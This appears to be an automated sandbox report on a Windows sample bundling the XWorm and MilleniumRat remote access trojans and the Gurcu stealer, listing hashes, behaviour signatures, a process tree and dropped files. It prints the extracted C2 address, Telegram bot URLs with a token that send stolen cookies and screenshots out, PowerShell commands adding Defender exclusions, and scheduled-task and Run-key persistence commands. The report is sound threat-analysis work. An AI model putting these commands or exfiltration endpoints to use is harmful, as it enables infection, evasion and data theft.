Analysis

  • max time kernel
    149s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 03:29

General

  • Target

    crypted.exe

  • Size

    20.7MB

  • MD5

    72201d2a8b18860b045bcf0df33ea846

  • SHA1

    8c0c7854825a09de4766b8dc0732e900af19f27c

  • SHA256

    503460c51a5c10fab8e05af5de5f531ec0b1e3c0f9fb69ff8465fae1c9e24ab5

  • SHA512

    85aa2e1a06b8b6e0500e6ea2cb1718f1f2b34032102d67ba807218dc879d5c2186dbf34ace25d248fda5842644d40b784cc3a2275b5bf8eaf412cead2547dd5d

  • SSDEEP

    393216:gsgRSfpBBhJE7YBAQ4T/u1xIne6xwnL848nVcdIFrp2lAqeQ7USb:jgRU/i7l7T/Xe18rVcdNATI

Malware Config

Extracted

Family

xworm

Version

5.0

C2

find-rubber.gl.at.ply.gg:5426

Mutex

CRQoPEkBWWzMBNPO

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7755383590:AAEvaE0gRP-tFTfH0LuSq-fhWltSTUkzf20/sendDocument?chat_id=-1002252855973&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot7755383590:AAEvaE0gRP-tFTfH0LuSq-fhWltSTUkzf20/sendMessage?chat_id=-1002252855973

https://api.telegram.org/bot7755383590:AAEvaE0gRP-tFTfH0LuSq-fhWltSTUkzf20/getUpdates?offset=-

https://api.telegram.org/bot7755383590:AAEvaE0gRP-tFTfH0LuSq-fhWltSTUkzf20/sendDocument?chat_id=-1002252855973&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Detect Xworm Payload 2 IoCs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Milleniumrat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 20 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3540
      • C:\Users\Admin\AppData\Local\Temp\crypted.exe
        "C:\Users\Admin\AppData\Local\Temp\crypted.exe"
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:432
        • C:\Users\Admin\AppData\Roaming\GoogIeUpdate.exe
          "C:\Users\Admin\AppData\Roaming\GoogIeUpdate.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:636
          • C:\Users\Admin\AppData\Roaming\GoogIeUpdate.exe
            "C:\Users\Admin\AppData\Roaming\GoogIeUpdate.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            PID:1436
        • C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe
          "C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe"
          3⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:5032
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GoogleUpdate.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2580
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4716
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\systemuser'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4228
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemuser'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2356
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "systemuser" /tr "C:\Users\Admin\AppData\Roaming\systemuser"
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2060
        • C:\Users\Admin\AppData\Roaming\SystemUser.exe
          "C:\Users\Admin\AppData\Roaming\SystemUser.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5052
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB71B.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpB71B.tmp.bat
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3060
            • C:\Windows\system32\chcp.com
              chcp 65001
              5⤵
                PID:1544
              • C:\Windows\system32\tasklist.exe
                Tasklist /fi "PID eq 5052"
                5⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4116
              • C:\Windows\system32\find.exe
                find ":"
                5⤵
                  PID:4980
                • C:\Windows\system32\timeout.exe
                  Timeout /T 1 /Nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:4352
                • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                  "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:4600
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2828
                    • C:\Windows\system32\reg.exe
                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                      7⤵
                      • Adds Run key to start application
                      • Modifies registry key
                      PID:2884
            • C:\Users\Admin\AppData\Roaming\Update.exe
              "C:\Users\Admin\AppData\Roaming\Update.exe"
              3⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:4380
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 884
              3⤵
              • Program crash
              PID:1948
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ikwps#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4176
          • C:\Windows\System32\schtasks.exe
            C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
            2⤵
              PID:3584
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ikwps#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
              2⤵
              • Command and Scripting Interpreter: PowerShell
              PID:3380
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe
              2⤵
                PID:4524
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 432 -ip 432
              1⤵
                PID:2428
              • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
                C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
                1⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2492
              • C:\Users\Admin\AppData\Roaming\systemuser
                C:\Users\Admin\AppData\Roaming\systemuser
                1⤵
                • Executes dropped EXE
                PID:4532
              • C:\Users\Admin\AppData\Roaming\systemuser
                C:\Users\Admin\AppData\Roaming\systemuser
                1⤵
                • Executes dropped EXE
                PID:4932

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

                Filesize

                1.7MB

                MD5

                65ccd6ecb99899083d43f7c24eb8f869

                SHA1

                27037a9470cc5ed177c0b6688495f3a51996a023

                SHA256

                aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

                SHA512

                533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\VCRUNTIME140.dll

                Filesize

                117KB

                MD5

                862f820c3251e4ca6fc0ac00e4092239

                SHA1

                ef96d84b253041b090c243594f90938e9a487a9a

                SHA256

                36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

                SHA512

                2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_bz2.pyd

                Filesize

                82KB

                MD5

                fe499b0a9f7f361fa705e7c81e1011fa

                SHA1

                cc1c98754c6dab53f5831b05b4df6635ad3f856d

                SHA256

                160b5218c2035cccbaab9dc4ca26d099f433dcb86dbbd96425c933dc796090df

                SHA512

                60520c5eb5ccc72ae2a4c0f06c8447d9e9922c5f9f1f195757362fc47651adcc1cdbfef193ae4fec7d7c1a47cf1d9756bd820be996ae145f0fbbbfba327c5742

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_ctypes.pyd

                Filesize

                122KB

                MD5

                302ddf5f83b5887ab9c4b8cc4e40b7a6

                SHA1

                0aa06af65d072eb835c8d714d0f0733dc2f47e20

                SHA256

                8250b4c102abd1dba49fc5b52030caa93ca34e00b86cee6547cc0a7f22326807

                SHA512

                5ddc2488fa192d8b662771c698a63faaf109862c8a4dd0df10fb113aef839d012df58346a87178aff9a1b369f82d8ae7819cef4aad542d8bd3f91327feace596

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_decimal.pyd

                Filesize

                250KB

                MD5

                82321fb8245333842e1c31f874329170

                SHA1

                81abb1d3d5c55db53e8aca9bdf74f2dec0aba1a3

                SHA256

                b7f9603f98ef232a2c5bce7001d842c01d76ed35171afbd898e6d17facf38b56

                SHA512

                0cf932ee0d1242ea9377d054adcd71fdd7ec335abbac865e82987e3979e24cead6939cca19da63a08e08ac64face16950edce7918e02bfc7710f09645fd2fa19

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_hashlib.pyd

                Filesize

                64KB

                MD5

                0abfee1db6c16e8ddaff12cd3e86475b

                SHA1

                b2dda9635ede4f2841912cc50cb3ae67eea89fe7

                SHA256

                b4cec162b985d34ab768f66e8fa41ed28dc2f273fde6670eeace1d695789b137

                SHA512

                0a5cae4e3442af1d62b65e8bf91e0f2a61563c2b971bbf008bfb2de0f038ee472e7bfcc88663dc503b2712e92e6a7e6a5f518ddab1fab2eb435d387b740d2d44

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_lzma.pyd

                Filesize

                154KB

                MD5

                e3e7e99b3c2ea56065740b69f1a0bc12

                SHA1

                79fa083d6e75a18e8b1e81f612acb92d35bb2aea

                SHA256

                b095fa2eac97496b515031fbea5737988b18deee86a11f2784f5a551732ddc0c

                SHA512

                35cbc30b1ccdc4f5cc9560fc0149373ccd9399eb9297e61d52e6662bb8c56c6a7569d8cfad85aeb057c10558c9352ae086c0467f684fdcf72a137eadf563a909

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_socket.pyd

                Filesize

                81KB

                MD5

                632336eeead53cfad22eb57f795d5657

                SHA1

                62f5f73d21b86cd3b73b68e5faec032618196745

                SHA256

                ce3090fff8575b21287df5fc69ae98806646fc302eefadf85e369ad3debad92b

                SHA512

                77965b45060545e210cdb044f25e5fd68d6a9150caf1cad7645dbafcf1ce8e1ccbdf8436fbdcbf5f9c293321c8916e114de30ed8897c7db72df7f8d1f98dfb55

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_ssl.pyd

                Filesize

                173KB

                MD5

                eea3e12970e28545a964a95da7e84e0b

                SHA1

                c3ccac86975f2704dabc1ffc3918e81feb3b9ac1

                SHA256

                61f00b0543464bba61e0bd1128118326c9bd0cdc592854dd1a31c3d6d8df2b83

                SHA512

                9bd5c83e7e0ab24d6be40a31ac469a0d9b4621a2a279a5f3ab2fc6401a08c54aec421bc9461aed533a0211d7dbda0c264c5f05aeb39138403da25c8cda0339e6

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tcl_data\auto.tcl

                Filesize

                21KB

                MD5

                08edf746b4a088cb4185c165177bd604

                SHA1

                395cda114f23e513eef4618da39bb86d034124bf

                SHA256

                517204ee436d08efc287abc97433c3bffcaf42ec6592a3009b9fd3b985ad772c

                SHA512

                c1727e265a6b0b54773c886a1bce73512e799ba81a4fceeeb84cdc33f5505a5e0984e96326a78c46bf142bc4652a80e213886f60eb54adf92e4dffe953c87f6b

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tcl_data\encoding\cp1252.enc

                Filesize

                1KB

                MD5

                e9117326c06fee02c478027cb625c7d8

                SHA1

                2ed4092d573289925a5b71625cf43cc82b901daf

                SHA256

                741859cf238c3a63bbb20ec6ed51e46451372bb221cfff438297d261d0561c2e

                SHA512

                d0a39bc41adc32f2f20b1a0ebad33bf48dfa6ed5cc1d8f92700cdd431db6c794c09d9f08bb5709b394acf54116c3a1e060e2abcc6b503e1501f8364d3eebcd52

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tcl_data\http1.0\pkgIndex.tcl

                Filesize

                746B

                MD5

                a387908e2fe9d84704c2e47a7f6e9bc5

                SHA1

                f3c08b3540033a54a59cb3b207e351303c9e29c6

                SHA256

                77265723959c092897c2449c5b7768ca72d0efcd8c505bddbb7a84f6aa401339

                SHA512

                7ac804d23e72e40e7b5532332b4a8d8446c6447bb79b4fe32402b13836079d348998ea0659802ab0065896d4f3c06f5866c6b0d90bf448f53e803d8c243bbc63

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tcl_data\init.tcl

                Filesize

                25KB

                MD5

                fe92c81bb4acdda00761c695344d5f1e

                SHA1

                a87e1516fbd1f9751ec590273925cbc5284b16bd

                SHA256

                7a103a85413988456c2ad615c879bbcb4d91435bcfbbe23393e0eb52b56af6e2

                SHA512

                c983076e420614d12ab2a7342f6f74dd5dcdad21c7c547f660e73b74b3be487a560abd73213df3f58be3d9dbd061a12d2956ca85a58d7b9d9e40d9fa6e6c25eb

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tcl_data\opt0.4\pkgIndex.tcl

                Filesize

                620B

                MD5

                07532085501876dcc6882567e014944c

                SHA1

                6bc7a122429373eb8f039b413ad81c408a96cb80

                SHA256

                6a4abd2c519a745325c26fb23be7bbf95252d653a24806eb37fd4aa6a6479afe

                SHA512

                0d604e862f3a1a19833ead99aaf15a9f142178029ab64c71d193cee4901a0196c1eeddc2bce715b7fa958ac45c194e63c77a71e4be4f9aedfd5b44cf2a726e76

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tcl_data\package.tcl

                Filesize

                23KB

                MD5

                ddb0ab9842b64114138a8c83c4322027

                SHA1

                eccacdc2ccd86a452b21f3cf0933fd41125de790

                SHA256

                f46ab61cdebe3aa45fa7e61a48930d64a0d0e7e94d04d6bf244f48c36cafe948

                SHA512

                c0cf718258b4d59675c088551060b34ce2bc8638958722583ac2313dc354223bfef793b02f1316e522a14c7ba9bed219531d505de94dc3c417fc99d216a01463

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tcl_data\tclIndex

                Filesize

                5KB

                MD5

                c62fb22f4c9a3eff286c18421397aaf4

                SHA1

                4a49b8768cff68f2effaf21264343b7c632a51b2

                SHA256

                ddf7e42def37888ad0a564aa4f8ca95f4eec942cebebfca851d35515104d5c89

                SHA512

                558d401cb6af8ce3641af55caebc9c5005ab843ee84f60c6d55afbbc7f7129da9c58c2f55c887c3159107546fa6bc13ffc4cca63ea8841d7160b8aa99161a185

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tcl_data\tm.tcl

                Filesize

                11KB

                MD5

                215262a286e7f0a14f22db1aa7875f05

                SHA1

                66b942ba6d3120ef8d5840fcdeb06242a47491ff

                SHA256

                4b7ed9fd2363d6876092db3f720cbddf97e72b86b519403539ba96e1c815ed8f

                SHA512

                6ecd745d7da9d826240c0ab59023c703c94b158ae48c1410faa961a8edb512976a4f15ae8def099b58719adf0d2a9c37e6f29f54d39c1ab7ee81fa333a60f39b

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tk_data\button.tcl

                Filesize

                21KB

                MD5

                aeb53f7f1506cdfdfe557f54a76060ce

                SHA1

                ebb3666ee444b91a0d335da19c8333f73b71933b

                SHA256

                1f5dd8d81b26f16e772e92fd2a22accb785004d0ed3447e54f87005d9c6a07a5

                SHA512

                acdad4df988df6b2290fc9622e8eaccc31787fecdc98dcca38519cb762339d4d3fb344ae504b8c7918d6f414f4ad05d15e828df7f7f68f363bec54b11c9b7c43

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tk_data\entry.tcl

                Filesize

                18KB

                MD5

                007f42fbcdc57652ac8381f11af7fb67

                SHA1

                1bb1b0fcad6f5633d1beb8903112f180b1c4ba7f

                SHA256

                65ba33a1e0b21e8e074780a51189cee6fd9926c85273e9e7633987fc212a17b2

                SHA512

                a27089719adafc48b5abb905e40d0c6a0a2507526223d72c1cff36ab7c15362c6f0b8ee5775181ba1730852802afa64631ee3720e624b630e3274bfb32f6a59a

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tk_data\icons.tcl

                Filesize

                10KB

                MD5

                995a0a8f7d0861c268aead5fc95a42ea

                SHA1

                21e121cf85e1c4984454237a646e58ec3c725a72

                SHA256

                1264940e62b9a37967925418e9d0dc0befd369e8c181b9bab3d1607e3cc14b85

                SHA512

                db7f5e0bc7d5c5f750e396e645f50a3e0cde61c9e687add0a40d0c1aa304ddfbceeb9f33ad201560c6e2b051f2eded07b41c43d00f14ee435cdeee73b56b93c7

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tk_data\listbox.tcl

                Filesize

                14KB

                MD5

                804e6dce549b2e541986c0ce9e75e2d1

                SHA1

                c44ee09421f127cf7f4070a9508f22709d06d043

                SHA256

                47c75f9f8348bf8f2c086c57b97b73741218100ca38d10b8abdf2051c95b9801

                SHA512

                029426c4f659848772e6bb1d8182eb03d2b43adf68fcfcc1ea1c2cc7c883685deda3fffda7e071912b9bda616ad7af2e1cb48ce359700c1a22e1e53e81cae34b

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tk_data\menu.tcl

                Filesize

                38KB

                MD5

                b7daa21c1c192b8cb5b86cbd7b2ce068

                SHA1

                ae8abf9017f37ccdf5d0d15de66bb124a7482ba0

                SHA256

                312af944a276cdbf1ee00757ef141595670984f7f13e19922c25643a040f5339

                SHA512

                b619e3b8be5ec4545e97b7a7a7f7fecc2aafa58438f9ca3819f644720cf5ff5c44da12ac25988570e595d97cad799f87d93c24d5e67a7a953b9f5312952fbeb6

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tk_data\panedwindow.tcl

                Filesize

                5KB

                MD5

                286c01a1b12261bc47f5659fd1627abd

                SHA1

                4ca36795cab6dfe0bbba30bb88a2ab71a0896642

                SHA256

                aa4f87e41ac8297f51150f2a9f787607690d01793456b93f0939c54d394731f9

                SHA512

                d54d5a89b7408a9724a1ca1387f6473bdad33885194b2ec5a524c7853a297fd65ce2a57f571c51db718f6a00dce845de8cf5f51698f926e54ed72cdc81bcfe54

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tk_data\pkgIndex.tcl

                Filesize

                376B

                MD5

                8a0517a7a4c70111080ed934329e2bc5

                SHA1

                5b465e0d3500a8f04ee1c705662032f44e2ed0d2

                SHA256

                a5d208887a94832328c3a33928a80f3b46aa205c20db4f050a47d940e94071b4

                SHA512

                d9f502a006a5e0514fd61426818ad1f4168e449588f9d383d6b0bf87a18be82c420863a9a28e1beb441284a0b1bc2a0b3d3276a0fe3196341aec15a27920de5d

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tk_data\scale.tcl

                Filesize

                8KB

                MD5

                d45202d3d2d052d4c6bfe8d1322aab39

                SHA1

                8cdf184ac2e9299b2b2a107a64e9d1803aa298de

                SHA256

                0747a387fdd1b2c7135eceae7b392ed52e1d1ebf3ffa90febe886dbc0981eb74

                SHA512

                27b005f955bae00d15c4492e7bd3ebdc5ee3bf9c164c418198b4bd185709c8810aa6cf76cbcc07eeb4c1d20f8c76ef8df8b219563c18b88c94954c910bff575d

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tk_data\tk.tcl

                Filesize

                23KB

                MD5

                184d05201893b2042d3fa6140fcf277c

                SHA1

                aad67797864456749adf0c4a1c0be52f563c8fb8

                SHA256

                1d5e7518afc1382e36bf13fc5196c8a7cd93a4e9d24acf445522564245a489b0

                SHA512

                291bdf793cabc5ec27e8265a8a313fe0f4acab4db6ce507a46488a83eef72cd43cf5815762b22d1c8d64a9eedea927e109f937e6573058e5493b1354dd449cb3

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\_tkinter.pyd

                Filesize

                64KB

                MD5

                ed2305190284e384a31337094c9f5239

                SHA1

                eb8faebf9fe9438541ca65b9892badc2233a405d

                SHA256

                2cad195ba200cd94702403559323c7abf3772a20203a11beae03770a04437de2

                SHA512

                139c83ebf748720e64c7a6a8f00f45755d17cd8f754cadc0804ece5753c02e5c95210a8b96a92fff89148ba34568f8b1bd6c33d1d3ba7a75f881446956876893

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\base_library.zip

                Filesize

                1.3MB

                MD5

                bed03063e08a571088685625544ce144

                SHA1

                56519a1b60314ec43f3af0c5268ecc4647239ba3

                SHA256

                0d960743dbf746817b61ff7dd1c8c99b4f8c915de26946be56118cd6bedaebdc

                SHA512

                c136e16db86f94b007db42a9bf485a7c255dcc2843b40337e8f22a67028117f5bd5d48f7c1034d7446bb45ea16e530f1216d22740ddb7fab5b39cc33d4c6d995

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\libcrypto-3.dll

                Filesize

                5.0MB

                MD5

                123ad0908c76ccba4789c084f7a6b8d0

                SHA1

                86de58289c8200ed8c1fc51d5f00e38e32c1aad5

                SHA256

                4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43

                SHA512

                80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\libffi-8.dll

                Filesize

                38KB

                MD5

                0f8e4992ca92baaf54cc0b43aaccce21

                SHA1

                c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

                SHA256

                eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

                SHA512

                6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\libssl-3.dll

                Filesize

                774KB

                MD5

                4ff168aaa6a1d68e7957175c8513f3a2

                SHA1

                782f886709febc8c7cebcec4d92c66c4d5dbcf57

                SHA256

                2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950

                SHA512

                c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\pyarmor_runtime_000000\pyarmor_runtime.pyd

                Filesize

                623KB

                MD5

                bf7ec0b82a738169c915eedbff1a3d62

                SHA1

                3fc649aa591215724379edb1b24043d9547be3c6

                SHA256

                f9f67929fdf5568227c1b3e16649956378638165f5e99d345f0df2faa904b926

                SHA512

                6284ffcb332c04e3712a999a5a435c6e39aaf4214016f9a269f2afe3dfd1b1e18ce6ba87e7609936fb0cc6484137b2ac0677f48774d8e6d67c976efc6a666b05

              • C:\Users\Admin\AppData\Local\Temp\_MEI6362\python312.dll

                Filesize

                6.6MB

                MD5

                b243d61f4248909bc721674d70a633de

                SHA1

                1d2fb44b29c4ac3cfd5a7437038a0c541fce82fc

                SHA256

                93488fa7e631cc0a2bd808b9eee8617280ee9b6ff499ab424a1a1cbf24d77dc7

                SHA512

                10460c443c7b9a6d7e39ad6e2421b8ca4d8329f1c4a0ff5b71ce73352d2e9438d45f7d59edb13ce30fad3b4f260bd843f4d9b48522d448310d43e0988e075fcb

